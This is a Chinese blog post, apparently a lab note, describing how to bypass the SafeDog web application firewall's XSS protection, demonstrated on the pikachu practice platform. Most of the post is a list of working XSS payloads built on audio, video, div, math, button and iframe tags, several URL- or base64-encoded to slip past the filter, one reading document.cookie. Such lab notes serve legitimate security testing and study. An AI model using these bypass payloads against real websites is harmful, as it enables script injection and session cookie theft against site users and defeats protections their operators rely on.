安全狗XSS攻击绕过

默认安全狗网站防护模块中,将XSS漏洞攻击拦截全部处于开启状态

 

 选择漏洞平台pikachu,使用XSS模块

 

 正常的,输入一段XSS代码(aaa'"><script>alert("222")</script>)后,会被WAF拦截

 

 WAF检测机制默认的将诸如:alert、prompt、comfirm等弹窗类的标签,都做了限制

1.H5新标签<audio>绕过:

<audio src=x onerror=alert(47)>

 

<audio src=x onerror=prompt(1);>

 

 

2.H5新标签<video>绕过:

<video src=x onerror=prompt(1);>

 

 

<video src=x onerror=alert(48)>

 

3.HTML<div>标签绕过: 

<div%20onmouseover%3d%27alert%26lpar%3b1%26rpar%3b%27>DIV<%2fdiv>,这个方法只在IE中会弹窗

 

 <div style="width:expression(alert(/1/))">1</div> ,在IE中弹窗 

 

 

 3.HTML<math>标签绕过:

<math><a/xlink:href=javascript:prompt(1)>Xss

 

 

 

<math href="javascript:javascript:alert(1)">Xss</math>

 

 4.HTML<button>标签绕过:

<button onfocus=alert(1) autofocus>

 

<button/onclick=alert(1)%20>xss</button>

 

 

 5.HTML<iframe>标签绕过:

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>,读取cookie

<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">

 

 以上方法均可绕过WAF XSS限制,部分功能需要在IE浏览器中进行测试。

 

posted @   田家少闲月-  阅读(913)  评论(0编辑  收藏  举报
编辑推荐:
· PostgreSQL 和 SQL Server 在统计信息维护中的关键差异
· C++代码改造为UTF-8编码问题的总结
· DeepSeek 解答了困扰我五年的技术问题
· 为什么说在企业级应用开发中,后端往往是效率杀手?
· 用 C# 插值字符串处理器写一个 sscanf
阅读排行:
· [翻译] 为什么 Tracebit 用 C# 开发
· Deepseek官网太卡,教你白嫖阿里云的Deepseek-R1满血版
· 2分钟学会 DeepSeek API,竟然比官方更好用!
· .NET 使用 DeepSeek R1 开发智能 AI 客户端
· 刚刚!百度搜索“换脑”引爆AI圈,正式接入DeepSeek R1满血版
点击右上角即可分享
微信分享提示